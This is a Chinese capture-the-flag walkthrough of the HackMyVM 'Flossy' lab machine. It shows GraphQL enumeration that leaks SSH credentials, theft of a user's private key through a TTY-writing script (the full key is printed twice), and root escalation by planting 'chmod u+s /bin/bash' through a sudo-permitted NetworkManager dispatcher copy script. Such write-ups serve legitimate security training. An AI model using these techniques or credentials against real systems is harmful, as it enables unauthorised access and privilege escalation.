[HackMyVM]靶场Flossy

难度:Medium

kali:192.168.56.104

靶机:192.168.56.142

端口扫描

┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.142
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-01 21:01 CST
Nmap scan report for 192.168.56.142
Host is up (0.00018s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:98:4D:04 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

开了22 80两个端口

浅扫目录

┌──(root㉿kali2)-[~/Desktop]
└─# gobuster dir -u http://192.168.56.142 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.142
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,html,txt,php,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 2392]
Progress: 425366 / 1323366 (32.14%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 425604 / 1323366 (32.16%)
===============================================================
Finished
===============================================================

只有index.html 0.0

去web看看什么情况

很朴素的界面

查看源码发现是graphql服务,通过发送json到graphql请求数据

没有东西

看一下有没有账号密码

没有找到,把character修改成user看一下

再改成users

好像有东西了,爆破一下id

id=9的时候爆破出来一组账号密码malo/8YdsA3CkiWx968

ssh连接看看

┌──(root㉿kali2)-[~/Desktop]
└─# ssh malo@192.168.56.142    
The authenticity of host '192.168.56.142 (192.168.56.142)' can't be established.
ED25519 key fingerprint is SHA256:TCA/ssXFaEc0sOJl0lvYyqTVTrCpkF0wQfyj5mJsALc.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:50: [hashed name]
    ~/.ssh/known_hosts:54: [hashed name]
    ~/.ssh/known_hosts:55: [hashed name]
    ~/.ssh/known_hosts:69: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.142' (ED25519) to the list of known hosts.
malo@192.168.56.142's password: 
Linux flossy 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.37-1 (2023-07-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
╭─malo@flossy ~ 
╰─$ whoami
malo

拿到shell

malo用户下没有user flag

╭─malo@flossy ~ 
╰─$ ls -al
total 216
drwxr-xr-x  5 malo malo   4096 Apr  1 15:11 .
drwxr-xr-x  4 root root   4096 Oct  6 20:49 ..
-rw-------  1 malo malo      4 Oct  7 10:06 .bash_history
-rw-r--r--  1 malo malo    220 Oct  6 18:27 .bash_logout
-rw-r--r--  1 malo malo   3526 Oct  6 18:27 .bashrc
drwxr-xr-x  3 malo malo   4096 Oct  6 20:59 .local
drwxr-xr-x 12 malo malo   4096 Oct  6 20:06 .oh-my-zsh
-rw-r--r--  1 malo malo    807 Oct  6 18:27 .profile
drwx------  2 malo malo   4096 Oct 10 18:36 .ssh
-rw-r--r--  1 malo malo  51798 Apr  1 15:10 .zcompdump-flossy-5.9
-r--r--r--  1 malo malo 119920 Apr  1 15:10 .zcompdump-flossy-5.9.zwc
-rw-------  1 malo malo     44 Apr  1 15:11 .zsh_history
-rw-r--r--  1 malo malo   3890 Oct  6 18:27 .zshrc
╭─malo@flossy ~ 

sophie用户有user flag,但是没有权限读

╭─malo@flossy /home/sophie 
╰─$ ls -al
total 56
drwxr-xr-x  5 sophie sophie 4096 Oct 10 19:31 .
drwxr-xr-x  4 root   root   4096 Oct  6 20:49 ..
-rw-------  1 root   root    370 Oct 10 18:37 .bash_history
-rw-r--r--  1 sophie sophie  220 Oct  6 20:49 .bash_logout
-rw-r--r--  1 sophie sophie 3526 Oct  6 20:49 .bashrc
drwxr-xr-x  3 sophie sophie 4096 Oct  6 20:49 .local
-rwxr-----  1 root   sophie  962 Oct  6 20:35 network
drwxr-xr-x 12 sophie sophie 4096 Oct  6 20:55 .oh-my-zsh
-rw-r--r--  1 sophie sophie  807 Oct  6 20:49 .profile
-rw-r--r--  1 sophie sophie   66 Oct  7 10:18 .selected_editor
drwx------  2 sophie sophie 4096 Oct 10 18:36 .ssh
-rwxr-xr-x  1 sophie sophie  630 Oct 10 14:23 SSHKeySync
-rwx------  1 sophie sophie   33 Oct 10 17:24 user.txt
-rw-r--r--  1 sophie sophie 3890 Oct  6 20:49 .zshrc
╭─malo@flossy /home/sophie 
╰─$ cat user.txt 
cat: user.txt: Permission denied

不过有一个SSHKeySync文件我们可以读取

─malo@flossy /home/sophie 
╰─$ cat SSHKeySync 
#!/bin/bash

# This script must run every minute in pre-prod

send_private_key() {
    local user_name="$1"
    local key_path="/home/$user_name/.ssh/id_rsa"
    local admin_tty="/dev/pts/24"

    if [ -f "$key_path" ]; then
        if [ -w "$admin_tty" ]; then
            cat "$key_path" > "$admin_tty"
        else
            echo "Error: Unable to write to $admin_tty"
        fi
    else
        echo "Error: The private key for $user_name doesn't exist."
    fi
}

while true ; do
  USER="sophie"
  echo "Sending $USER's private key to a high-privileged TTY for quick testing..."
  send_private_key "$USER"
  sleep 1m
done

这个脚本会发送 sophie的私钥,但是tty得是/dev/pts/24

目前tty是/dev/pts/0

╭─malo@flossy /dev/pts 
╰─$ tty
/dev/pts/0

那就连25次ssh吧

搞到第25个终端

╭─malo@flossy ~ 
╰─$ tty
/dev/pts/24
╭─malo@flossy ~ 
╰─$ -----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

然后用私钥登上sophie的ssh

╭─malo@flossy ~ 
╰─$ nano id_rsa
╭─malo@flossy ~ 
╰─$ cat id_rsa  
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
╭─malo@flossy ~ 
╰─$ ssh -i id_rsa sophie@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ED25519 key fingerprint is SHA256:TCA/ssXFaEc0sOJl0lvYyqTVTrCpkF0wQfyj5mJsALc.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '127.0.0.1' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
sophie@127.0.0.1's password: 

chmod: cannot access '600': No such file or directory
╭─malo@flossy ~ 
╰─$ chmod 600 id_rsa   
╭─malo@flossy ~ 
╰─$ ssh -i id_rsa sophie@127.0.0.1
Linux flossy 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.37-1 (2023-07-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
╭─sophie@flossy ~ 
╰─$ whoami
sophie

拿到user flag

sudo -l发现network可以提权

╭─sophie@flossy ~ 
╰─$ sudo -l
sudo: unable to resolve host flossy: Temporary failure in name resolution
Matching Defaults entries for sophie on flossy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User sophie may run the following commands on flossy:
    (ALL : ALL) NOPASSWD: /home/sophie/network*

看一下network

╭─sophie@flossy ~ 
╰─$ cat network 
#!/bin/bash


connected_ip(){
        connection_type=TCP
        champ=2
        ignores=LISTEN
        lsof_args=-ni

        port_local="[0-9][0-9][0-9][0-9][0-9]->"

        lsof "$lsof_args" | grep $connection_type | grep -v "$ignores" |
        awk '{print $9}' | cut -d : -f $champ | sort | uniq |
        sed s/"^$port_local"//
 }

dispatcher() {
    for s in /opt/*; do
        if [ -f "$s" ]; then
            d="/etc/NetworkManager/dispatcher.d/$(basename $s)"
            if [ ! -f "$d" ] || [ "$s" -nt "$d" ]; then
                return 0
            fi
        fi
    done
    return 1
}

update() {
    if [[ -z $(find /opt -type f) ]] ; then
      exit 0
    else
      echo "Updating scripts."
      cp /opt/* /etc/NetworkManager/dispatcher.d/
      chmod +x /etc/NetworkManager/dispatcher.d/*
      echo "Scripts updated."
    fi
}



case "${1}" in
ip)   connected_ip ;;
disp) dispatcher ; update ;;
*)    echo "Usage: ./$0 option" ;;
esac

脚本会将opt目录下的文件复制到/etc/NetworkManager/dispatcher.d/并赋予可执行权限,那就可以写个脚本再opt里面,然后执行disp,就会把它复制到/etc/NetworkManager/dispatcher.d/

╭─sophie@flossy /etc/NetworkManager/dispatcher.d 
╰─$ echo "chmod u+s /bin/bash" > /opt/SUID_bash                                  
╭─sophie@flossy /etc/NetworkManager/dispatcher.d 
╰─$ sudo /home/sophie/network disp             
sudo: unable to resolve host flossy: Name or service not known
Updating scripts.
Scripts updated.
╭─sophie@flossy /etc/NetworkManager/dispatcher.d 
╰─$ ls -al
total 32
drwxr-xr-x 5 root root 4096 Oct 31 10:55 .
drwxr-xr-x 7 root root 4096 Oct  6 18:52 ..
-rwxr-xr-x 1 root root 2293 Mar  9  2023 01-ifupdown
drwxr-xr-x 2 root root 4096 Mar  9  2023 no-wait.d
drwxr-xr-x 2 root root 4096 Mar  9  2023 pre-down.d
drwxr-xr-x 2 root root 4096 Mar  9  2023 pre-up.d
-rwxr-xr-x 1 root root   20 Oct 31 10:55 SUID_bash
╭─sophie@flossy /etc/NetworkManager/dispatcher.d 
╰─$ ./SUID_bash 
chmod: changing permissions of '/bin/bash': Operation not permitted

发现没有权限执行,是因为网络配置需要重新加载

╭─sophie@flossy /etc/NetworkManager/dispatcher.d 
╰─$ ip a                                                                                                                               127 ↵
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:98:4d:04 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.142/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 365sec preferred_lft 365sec
    inet6 fe80::a00:27ff:fe98:4d04/64 scope link 
       valid_lft forever preferred_lft forever
╭─sophie@flossy /etc/NetworkManager/dispatcher.d 
╰─$ nmcli con up lo
Connection successfully activated (D-Bus active path: /org/freedesktop/NetworkManager/ActiveConnection/2)
╭─sophie@flossy /etc/NetworkManager/dispatcher.d 
╰─$ ./mybash
chmod: changing permissions of '/bin/bash': Operation not permitted
╭─sophie@flossy /etc/NetworkManager/dispatcher.d 
╰─$ bash -p                                                                                                                              1 ↵
bash-5.2# id
uid=1001(sophie) gid=1001(sophie) euid=0(root) groups=1001(sophie),100(users)
bash-5.2# cat /root/r*
355cec17306ab25389f376ef4a21422e

成功root

相关推荐
IT 青年2 天前
信息安全工程师(78)网络安全应急响应技术与常见工具
网络空间安全·信息安全工程师·网络安全应急响应技术与常见工具
IT 青年4 天前
信息安全工程师(74)网络安全风险评估技术方法与工具
网络空间安全·信息安全工程师·网络安全风险评估技术方法与工具
IT 青年13 天前
信息安全工程师(70)网络攻击陷阱技术与应用
网络空间安全·信息安全工程师·网络攻击陷阱技术与应用
IT 青年15 天前
信息安全工程师(66)入侵阻断技术与应用
网络空间安全·信息安全工程师·1024程序员节·入侵阻断技术与应用
IT 青年15 天前
信息安全工程师(55)网络安全漏洞概述
网络空间安全·信息安全工程师·网络安全漏洞概述
IT 青年17 天前
信息安全工程师(63)僵尸网络分析与防护
网络空间安全·信息安全工程师·僵尸网络分析与防护
IT 青年18 天前
信息安全工程师(51)网络安全审计概述
网络空间安全·信息安全工程师·网络安全审计概述
IT 青年22 天前
信息安全工程师(54)网络安全审计主要产品与技术指标
网络空间安全·信息安全工程师·网络安全审计主要产品与技术指标
xixixi7777725 天前
常见的内网渗透思路及方法(包含示例)
网络·渗透·内网渗透
IT 青年1 个月前
信息安全工程师(37)防火墙概述
网络空间安全·信息安全工程师·防火墙概述